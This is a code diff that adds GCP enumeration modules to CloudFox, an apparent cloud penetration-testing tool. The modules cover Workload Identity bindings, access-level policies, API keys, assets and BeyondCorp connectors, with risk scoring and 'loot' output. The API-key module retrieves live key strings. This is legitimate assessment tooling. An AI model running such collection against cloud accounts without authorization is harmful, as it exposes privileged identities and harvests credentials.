m.Clusters { + wiEnabled := "No" + if cwi.WorkloadPoolEnabled { + wiEnabled = "Yes" + } + workloadPool := "-" + if cwi.WorkloadPool != "" { + workloadPool = cwi.WorkloadPool + } + + clustersBody = append(clustersBody, []string{ + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + wiEnabled, + workloadPool, + fmt.Sprintf("%d/%d", cwi.NodePoolsWithWI, cwi.TotalNodePools), + }) + } + + // Bindings table + bindingsHeader := []string{ + "K8s Namespace", + "K8s Service Account", + "GCP Service Account", + "High Privilege", + "Cluster", + "Project", + } + + var bindingsBody [][]string + for _, binding := range m.Bindings { + highPriv := "" + if binding.IsHighPrivilege { + highPriv = "YES" + } + + bindingsBody = append(bindingsBody, []string{ + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + binding.ClusterName, + binding.ProjectID, + }) + } + + // High-privilege bindings table + highPrivHeader := []string{ + "K8s SA (namespace/name)", + "GCP Service Account", + "Roles", + "Cluster", + } + + var highPrivBody [][]string + for _, binding := range m.Bindings { + if binding.IsHighPrivilege { + highPrivBody = append(highPrivBody, []string{ + fmt.Sprintf("%s/%s", binding.KubernetesNS, binding.KubernetesSA), + binding.GCPServiceAccount, + strings.Join(binding.GCPSARoles, ", "), + binding.ClusterName, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "workload-identity-clusters", + Header: clustersHeader, + Body: clustersBody, + }, + } + + // Add bindings table if there are any + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + // Add high-privilege table if there are any + if len(highPrivBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-high-privilege", + Header: highPrivHeader, + Body: highPrivBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege Workload Identity binding(s)!", len(highPrivBody)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // ============================ + // Workload Identity Federation tables + // ============================ + + // Federation Pools table + if len(m.Pools) > 0 { + poolsHeader := []string{ + "Pool ID", + "Project", + "Display Name", + "State", + "Disabled", + } + + var poolsBody [][]string + for _, pool := range m.Pools { + disabled := "No" + if pool.Disabled { + disabled = "Yes" + } + poolsBody = append(poolsBody, []string{ + pool.PoolID, + pool.ProjectID, + pool.DisplayName, + pool.State, + disabled, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federation-pools", + Header: poolsHeader, + Body: poolsBody, + }) + } + + // Federation Providers table + if len(m.Providers) > 0 { + providersHeader := []string{ + "Risk", + "Pool", + "Provider", + "Type", + "Issuer/Account", + "Attribute Condition", + "Project", + } + + var providersBody [][]string + for _, p := range m.Providers { + issuerOrAccount := "" + if p.ProviderType == "AWS" { + issuerOrAccount = p.AWSAccountID + } else if p.ProviderType == "OIDC" { + issuerOrAccount = p.OIDCIssuerURI + if len(issuerOrAccount) > 40 { + issuerOrAccount = issuerOrAccount[:40] + "..." + } + } + + attrCond := p.AttributeCondition + if attrCond == "" { + attrCond = "NONE" + } else if len(attrCond) > 30 { + attrCond = attrCond[:30] + "..." + } + + providersBody = append(providersBody, []string{ + p.RiskLevel, + p.PoolID, + p.ProviderID, + p.ProviderType, + issuerOrAccount, + attrCond, + p.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federation-providers", + Header: providersHeader, + Body: providersBody, + }) + } + + // Federated bindings table + if len(m.FederatedBindings) > 0 { + fedBindingsHeader := []string{ + "Risk", + "Pool", + "GCP Service Account", + "External Subject", + "Project", + } + + var fedBindingsBody [][]string + for _, fb := range m.FederatedBindings { + externalSubject := fb.ExternalSubject + if len(externalSubject) > 50 { + externalSubject = externalSubject[:50] + "..." + } + + fedBindingsBody = append(fedBindingsBody, []string{ + fb.RiskLevel, + fb.PoolID, + fb.GCPServiceAccount, + externalSubject, + fb.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federated-bindings", + Header: fedBindingsHeader, + Body: fedBindingsBody, + }) + } + + output := WorkloadIdentityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/services/accessPolicyService/accessPolicyService.go b/gcp/services/accessPolicyService/accessPolicyService.go new file mode 100644 index 00000000..8403fb07 --- /dev/null +++ b/gcp/services/accessPolicyService/accessPolicyService.go @@ -0,0 +1,282 @@ +package accesspolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type AccessPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *AccessPolicyService { + return &AccessPolicyService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AccessPolicyService { + return &AccessPolicyService{session: session} +} + +// AccessLevelInfo represents an access level (conditional access policy) +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + PolicyName string `json:"policyName"` + + // Basic level conditions + CombiningFunction string `json:"combiningFunction"` // AND or OR + Conditions []ConditionInfo `json:"conditions"` + + // Custom level + HasCustomLevel bool `json:"hasCustomLevel"` + CustomExpression string `json:"customExpression"` + + // Analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ConditionInfo represents a condition in an access level +type ConditionInfo struct { + IPSubnetworks []string `json:"ipSubnetworks"` + DevicePolicy *DevicePolicyInfo `json:"devicePolicy"` + RequiredAccessLevels []string `json:"requiredAccessLevels"` + Negate bool `json:"negate"` + Members []string `json:"members"` + Regions []string `json:"regions"` +} + +// DevicePolicyInfo represents device policy requirements +type DevicePolicyInfo struct { + RequireScreenLock bool `json:"requireScreenLock"` + RequireAdminApproval bool `json:"requireAdminApproval"` + RequireCorpOwned bool `json:"requireCorpOwned"` + AllowedEncryption []string `json:"allowedEncryptionStatuses"` + AllowedDeviceMgmt []string `json:"allowedDeviceManagementLevels"` + OSConstraints []string `json:"osConstraints"` +} + +// GCIPSettingsInfo represents Google Cloud Identity Platform settings +type GCIPSettingsInfo struct { + TenantIDs []string `json:"tenantIds"` + LoginPageURI string `json:"loginPageUri"` +} + +// ListAccessLevels retrieves all access levels for an organization's policy +func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + } + + var allLevels []AccessLevelInfo + + // First, get access policies for the org + parent := fmt.Sprintf("organizations/%s", orgID) + policiesReq := service.AccessPolicies.List().Parent(parent) + err = policiesReq.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + policyName := extractPolicyName(policy.Name) + + // Get access levels for this policy + levelsParent := fmt.Sprintf("accessPolicies/%s", policyName) + levelsReq := service.AccessPolicies.AccessLevels.List(levelsParent) + levelsReq.Pages(ctx, func(levelsPage *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range levelsPage.AccessLevels { + info := s.parseAccessLevel(level, policyName) + allLevels = append(allLevels, info) + } + return nil + }) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list access policies: %v", err) + } + + return allLevels, nil +} + +// ListAccessLevelsForPolicy retrieves access levels for a specific policy +func (s *AccessPolicyService) ListAccessLevelsForPolicy(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list access levels: %v", err) + } + + return levels, nil +} + +func (s *AccessPolicyService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + Description: level.Description, + PolicyName: policyName, + RiskReasons: []string{}, + } + + // Parse basic level + if level.Basic != nil { + info.CombiningFunction = level.Basic.CombiningFunction + + for _, condition := range level.Basic.Conditions { + condInfo := ConditionInfo{ + IPSubnetworks: condition.IpSubnetworks, + Negate: condition.Negate, + Members: condition.Members, + Regions: condition.Regions, + } + + for _, reqLevel := range condition.RequiredAccessLevels { + condInfo.RequiredAccessLevels = append(condInfo.RequiredAccessLevels, extractLevelName(reqLevel)) + } + + // Parse device policy + if condition.DevicePolicy != nil { + dp := condition.DevicePolicy + condInfo.DevicePolicy = &DevicePolicyInfo{ + RequireScreenLock: dp.RequireScreenlock, + RequireAdminApproval: dp.RequireAdminApproval, + RequireCorpOwned: dp.RequireCorpOwned, + AllowedEncryption: dp.AllowedEncryptionStatuses, + AllowedDeviceMgmt: dp.AllowedDeviceManagementLevels, + } + + for _, os := range dp.OsConstraints { + condInfo.DevicePolicy.OSConstraints = append(condInfo.DevicePolicy.OSConstraints, + fmt.Sprintf("%s:%s", os.OsType, os.MinimumVersion)) + } + } + + info.Conditions = append(info.Conditions, condInfo) + } + } + + // Parse custom level + if level.Custom != nil && level.Custom.Expr != nil { + info.HasCustomLevel = true + info.CustomExpression = level.Custom.Expr.Expression + } + + info.RiskLevel, info.RiskReasons = s.analyzeAccessLevelRisk(info) + + return info +} + +func (s *AccessPolicyService) analyzeAccessLevelRisk(level AccessLevelInfo) (string, []string) { + var reasons []string + score := 0 + + for _, condition := range level.Conditions { + // Check for overly broad IP ranges + for _, ip := range condition.IPSubnetworks { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Access level allows all IP addresses (0.0.0.0/0)") + score += 3 + break + } + } + + // Check for allUsers or allAuthenticatedUsers + for _, member := range condition.Members { + if member == "allUsers" { + reasons = append(reasons, "Access level includes allUsers") + score += 3 + } else if member == "allAuthenticatedUsers" { + reasons = append(reasons, "Access level includes allAuthenticatedUsers") + score += 2 + } + } + + // No device policy requirements + if condition.DevicePolicy == nil { + reasons = append(reasons, "No device policy requirements") + score += 1 + } else { + // Weak device policy + if !condition.DevicePolicy.RequireScreenLock { + reasons = append(reasons, "Does not require screen lock") + score += 1 + } + if !condition.DevicePolicy.RequireCorpOwned { + reasons = append(reasons, "Does not require corporate-owned device") + score += 1 + } + } + } + + // No conditions at all + if len(level.Conditions) == 0 && !level.HasCustomLevel { + reasons = append(reasons, "Access level has no conditions defined") + score += 2 + } + + // OR combining function is more permissive + if level.CombiningFunction == "OR" && len(level.Conditions) > 1 { + reasons = append(reasons, "Uses OR combining function (any condition grants access)") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go new file mode 100644 index 00000000..4e5ed1f6 --- /dev/null +++ b/gcp/services/apikeysService/apikeysService.go @@ -0,0 +1,322 @@ +package apikeysservice + +import ( + "context" + "fmt" + "strings" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + apikeys "google.golang.org/api/apikeys/v2" + "google.golang.org/api/option" +) + +var logger internal.Logger + +type APIKeysService struct { + session *gcpinternal.SafeSession +} + +// New creates a new APIKeysService +func New() *APIKeysService { + return &APIKeysService{} +} + +// NewWithSession creates an APIKeysService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *APIKeysService { + return &APIKeysService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *APIKeysService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// APIKeyInfo represents information about an API key +type APIKeyInfo struct { + Name string `json:"name"` // Full resource name + UID string `json:"uid"` // Unique identifier + DisplayName string `json:"displayName"` // User-friendly name + KeyString string `json:"keyString"` // The actual key value (if accessible) + ProjectID string `json:"projectId"` + CreateTime time.Time `json:"createTime"` + UpdateTime time.Time `json:"updateTime"` + DeleteTime time.Time `json:"deleteTime"` + Annotations map[string]string `json:"annotations"` + + // Restrictions + HasRestrictions bool `json:"hasRestrictions"` + AllowedAPIs []string `json:"allowedApis"` // API targets + AllowedReferers []string `json:"allowedReferers"` // HTTP referer restrictions + AllowedIPs []string `json:"allowedIps"` // IP restrictions + AllowedAndroidApps []string `json:"allowedAndroidApps"` // Android app restrictions + AllowedIOSApps []string `json:"allowedIosApps"` // iOS app restrictions + RestrictionType string `json:"restrictionType"` // "browser", "server", "android", "ios", "none" + + // Security Analysis + IsUnrestricted bool `json:"isUnrestricted"` // No restrictions at all + RiskLevel string `json:"riskLevel"` // HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` +} + +// ListAPIKeys retrieves all API keys in a project +func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create API Keys service: %v", err) + } + + var keys []APIKeyInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Keys.List(parent) + err = req.Pages(ctx, func(page *apikeys.V2ListKeysResponse) error { + for _, key := range page.Keys { + keyInfo := s.parseAPIKey(key, projectID) + keys = append(keys, keyInfo) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list API keys: %v", err) + } + + return keys, nil +} + +// GetAPIKey retrieves a single API key with its key string +func (s *APIKeysService) GetAPIKey(keyName string) (*APIKeyInfo, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create API Keys service: %v", err) + } + + key, err := service.Projects.Locations.Keys.Get(keyName).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get API key: %v", err) + } + + // Extract project ID from key name + // Format: projects/{project}/locations/global/keys/{key} + parts := strings.Split(keyName, "/") + projectID := "" + if len(parts) >= 2 { + projectID = parts[1] + } + + keyInfo := s.parseAPIKey(key, projectID) + return &keyInfo, nil +} + +// GetKeyString retrieves the key string value for an API key +func (s *APIKeysService) GetKeyString(keyName string) (string, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return "", fmt.Errorf("failed to create API Keys service: %v", err) + } + + resp, err := service.Projects.Locations.Keys.GetKeyString(keyName).Context(ctx).Do() + if err != nil { + return "", fmt.Errorf("failed to get key string: %v", err) + } + + return resp.KeyString, nil +} + +// parseAPIKey converts an API key response to APIKeyInfo +func (s *APIKeysService) parseAPIKey(key *apikeys.V2Key, projectID string) APIKeyInfo { + info := APIKeyInfo{ + Name: key.Name, + UID: key.Uid, + DisplayName: key.DisplayName, + ProjectID: projectID, + Annotations: key.Annotations, + RiskReasons: []string{}, + } + + // Parse times + if key.CreateTime != "" { + if t, err := time.Parse(time.RFC3339, key.CreateTime); err == nil { + info.CreateTime = t + } + } + if key.UpdateTime != "" { + if t, err := time.Parse(time.RFC3339, key.UpdateTime); err == nil { + info.UpdateTime = t + } + } + if key.DeleteTime != "" { + if t, err := time.Parse(time.RFC3339, key.DeleteTime); err == nil { + info.DeleteTime = t + } + } + + // Parse restrictions + if key.Restrictions != nil { + info.HasRestrictions = true + + // API restrictions + if key.Restrictions.ApiTargets != nil { + for _, target := range key.Restrictions.ApiTargets { + info.AllowedAPIs = append(info.AllowedAPIs, target.Service) + } + } + + // Browser restrictions (HTTP referers) + if key.Restrictions.BrowserKeyRestrictions != nil { + info.RestrictionType = "browser" + info.AllowedReferers = key.Restrictions.BrowserKeyRestrictions.AllowedReferrers + } + + // Server restrictions (IPs) + if key.Restrictions.ServerKeyRestrictions != nil { + info.RestrictionType = "server" + info.AllowedIPs = key.Restrictions.ServerKeyRestrictions.AllowedIps + } + + // Android restrictions + if key.Restrictions.AndroidKeyRestrictions != nil { + info.RestrictionType = "android" + for _, app := range key.Restrictions.AndroidKeyRestrictions.AllowedApplications { + info.AllowedAndroidApps = append(info.AllowedAndroidApps, + fmt.Sprintf("%s:%s", app.PackageName, app.Sha1Fingerprint)) + } + } + + // iOS restrictions + if key.Restrictions.IosKeyRestrictions != nil { + info.RestrictionType = "ios" + info.AllowedIOSApps = key.Restrictions.IosKeyRestrictions.AllowedBundleIds + } + + // Check if truly restricted + if len(info.AllowedAPIs) == 0 && + len(info.AllowedReferers) == 0 && + len(info.AllowedIPs) == 0 && + len(info.AllowedAndroidApps) == 0 && + len(info.AllowedIOSApps) == 0 { + info.HasRestrictions = false + info.IsUnrestricted = true + } + } else { + info.IsUnrestricted = true + info.RestrictionType = "none" + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeAPIKeyRisk(info) + + return info +} + +// analyzeAPIKeyRisk determines the risk level of an API key +func (s *APIKeysService) analyzeAPIKeyRisk(key APIKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Unrestricted keys are high risk + if key.IsUnrestricted { + reasons = append(reasons, "No restrictions applied - key can be used from anywhere") + score += 4 + } + + // No API restrictions + if len(key.AllowedAPIs) == 0 && !key.IsUnrestricted { + reasons = append(reasons, "No API restrictions - key can access all enabled APIs") + score += 2 + } + + // Overly permissive API access + for _, api := range key.AllowedAPIs { + if strings.Contains(api, "admin") || strings.Contains(api, "iam") { + reasons = append(reasons, fmt.Sprintf("Has access to sensitive API: %s", api)) + score += 2 + } + } + + // Wildcard in referers + for _, referer := range key.AllowedReferers { + if referer == "*" || referer == "*.com" { + reasons = append(reasons, fmt.Sprintf("Overly permissive referer: %s", referer)) + score += 2 + } + } + + // 0.0.0.0/0 in IPs + for _, ip := range key.AllowedIPs { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Allows access from any IP (0.0.0.0/0)") + score += 3 + } + } + + // Old keys + if !key.CreateTime.IsZero() { + age := time.Since(key.CreateTime) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is older than 1 year (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Determine risk level + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + + return "INFO", reasons +} + +// ListAPIKeysWithKeyStrings retrieves all API keys with their key strings +func (s *APIKeysService) ListAPIKeysWithKeyStrings(projectID string) ([]APIKeyInfo, error) { + keys, err := s.ListAPIKeys(projectID) + if err != nil { + return nil, err + } + + // Try to get key strings for each key + for i := range keys { + keyString, err := s.GetKeyString(keys[i].Name) + if err != nil { + // Log but don't fail - we might not have permission + logger.InfoM(fmt.Sprintf("Could not get key string for %s: %v", keys[i].Name, err), globals.GCP_APIKEYS_MODULE_NAME) + } else { + keys[i].KeyString = keyString + } + } + + return keys, nil +} diff --git a/gcp/services/assetService/assetService.go b/gcp/services/assetService/assetService.go new file mode 100644 index 00000000..0d096652 --- /dev/null +++ b/gcp/services/assetService/assetService.go @@ -0,0 +1,370 @@ +package assetservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + asset "cloud.google.com/go/asset/apiv1" + assetpb "cloud.google.com/go/asset/apiv1/assetpb" + "google.golang.org/api/iterator" +) + +type AssetService struct { + session *gcpinternal.SafeSession +} + +func New() *AssetService { + return &AssetService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AssetService { + return &AssetService{session: session} +} + +// AssetInfo represents a Cloud Asset +type AssetInfo struct { + Name string `json:"name"` + AssetType string `json:"assetType"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Labels map[string]string `json:"labels"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy summary + HasIAMPolicy bool `json:"hasIamPolicy"` + IAMBindings int `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` + + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// AssetTypeCount tracks count of assets by type +type AssetTypeCount struct { + AssetType string `json:"assetType"` + Count int `json:"count"` +} + +// Common asset types for filtering +var CommonAssetTypes = []string{ + "compute.googleapis.com/Instance", + "compute.googleapis.com/Disk", + "compute.googleapis.com/Firewall", + "compute.googleapis.com/Network", + "compute.googleapis.com/Subnetwork", + "storage.googleapis.com/Bucket", + "iam.googleapis.com/ServiceAccount", + "iam.googleapis.com/ServiceAccountKey", + "secretmanager.googleapis.com/Secret", + "cloudkms.googleapis.com/CryptoKey", + "cloudfunctions.googleapis.com/Function", + "run.googleapis.com/Service", + "container.googleapis.com/Cluster", + "sqladmin.googleapis.com/Instance", + "pubsub.googleapis.com/Topic", + "pubsub.googleapis.com/Subscription", + "bigquery.googleapis.com/Dataset", + "bigquery.googleapis.com/Table", +} + +// ListAssets retrieves assets for a project, optionally filtered by type +func (s *AssetService) ListAssets(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Asset Inventory client: %v", err) + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, fmt.Errorf("failed to iterate assets: %v", err) + } + + info := s.parseAsset(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// ListAssetsWithIAM retrieves assets with their IAM policies +func (s *AssetService) ListAssetsWithIAM(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Asset Inventory client: %v", err) + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_IAM_POLICY, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, fmt.Errorf("failed to iterate assets: %v", err) + } + + info := s.parseAssetWithIAM(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// GetAssetTypeCounts returns a summary of asset counts by type +func (s *AssetService) GetAssetTypeCounts(projectID string) ([]AssetTypeCount, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Asset Inventory client: %v", err) + } + defer client.Close() + + counts := make(map[string]int) + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, fmt.Errorf("failed to iterate assets: %v", err) + } + + counts[assetResult.AssetType]++ + } + + var result []AssetTypeCount + for assetType, count := range counts { + result = append(result, AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + + return result, nil +} + +// SearchAllResources searches for resources across the organization or project +func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Asset Inventory client: %v", err) + } + defer client.Close() + + var assets []AssetInfo + + req := &assetpb.SearchAllResourcesRequest{ + Scope: scope, + Query: query, + } + + it := client.SearchAllResources(ctx, req) + for { + resource, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, fmt.Errorf("failed to search resources: %v", err) + } + + info := AssetInfo{ + Name: resource.Name, + AssetType: resource.AssetType, + ProjectID: resource.Project, + Location: resource.Location, + DisplayName: resource.DisplayName, + Description: resource.Description, + Labels: resource.Labels, + State: resource.State, + CreateTime: resource.CreateTime.String(), + UpdateTime: resource.UpdateTime.String(), + RiskReasons: []string{}, + } + + info.RiskLevel, info.RiskReasons = s.analyzeAssetRisk(info) + assets = append(assets, info) + } + + return assets, nil +} + +func (s *AssetService) parseAsset(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + RiskReasons: []string{}, + } + + if assetResult.Resource != nil { + info.Location = assetResult.Resource.Location + // Additional resource data parsing could be added here + } + + info.RiskLevel, info.RiskReasons = s.analyzeAssetRisk(info) + + return info +} + +func (s *AssetService) parseAssetWithIAM(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + RiskReasons: []string{}, + } + + if assetResult.IamPolicy != nil { + info.HasIAMPolicy = true + info.IAMBindings = len(assetResult.IamPolicy.Bindings) + + // Check for public access + for _, binding := range assetResult.IamPolicy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + break + } + } + if info.PublicAccess { + break + } + } + } + + info.RiskLevel, info.RiskReasons = s.analyzeAssetRisk(info) + + return info +} + +func (s *AssetService) analyzeAssetRisk(asset AssetInfo) (string, []string) { + var reasons []string + score := 0 + + // Public access + if asset.PublicAccess { + reasons = append(reasons, "Resource has public access (allUsers or allAuthenticatedUsers)") + score += 3 + } + + // Sensitive asset types + sensitiveTypes := []string{ + "iam.googleapis.com/ServiceAccountKey", + "secretmanager.googleapis.com/Secret", + "cloudkms.googleapis.com/CryptoKey", + } + for _, sensitiveType := range sensitiveTypes { + if asset.AssetType == sensitiveType { + reasons = append(reasons, fmt.Sprintf("Sensitive asset type: %s", sensitiveType)) + score += 1 + break + } + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractAssetName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// ExtractAssetTypeShort returns a shortened version of the asset type +func ExtractAssetTypeShort(assetType string) string { + parts := strings.Split(assetType, "/") + if len(parts) == 2 { + return parts[1] + } + return assetType +} diff --git a/gcp/services/beyondcorpService/beyondcorpService.go b/gcp/services/beyondcorpService/beyondcorpService.go new file mode 100644 index 00000000..5fc2ba19 --- /dev/null +++ b/gcp/services/beyondcorpService/beyondcorpService.go @@ -0,0 +1,234 @@ +package beyondcorpservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + beyondcorp "google.golang.org/api/beyondcorp/v1" +) + +type BeyondCorpService struct { + session *gcpinternal.SafeSession +} + +func New() *BeyondCorpService { + return &BeyondCorpService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BeyondCorpService { + return &BeyondCorpService{session: session} +} + +// AppConnectorInfo represents a BeyondCorp app connector +type AppConnectorInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + PrincipalInfo string `json:"principalInfo"` + ResourceInfo string `json:"resourceInfo"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// AppConnectionInfo represents a BeyondCorp app connection +type 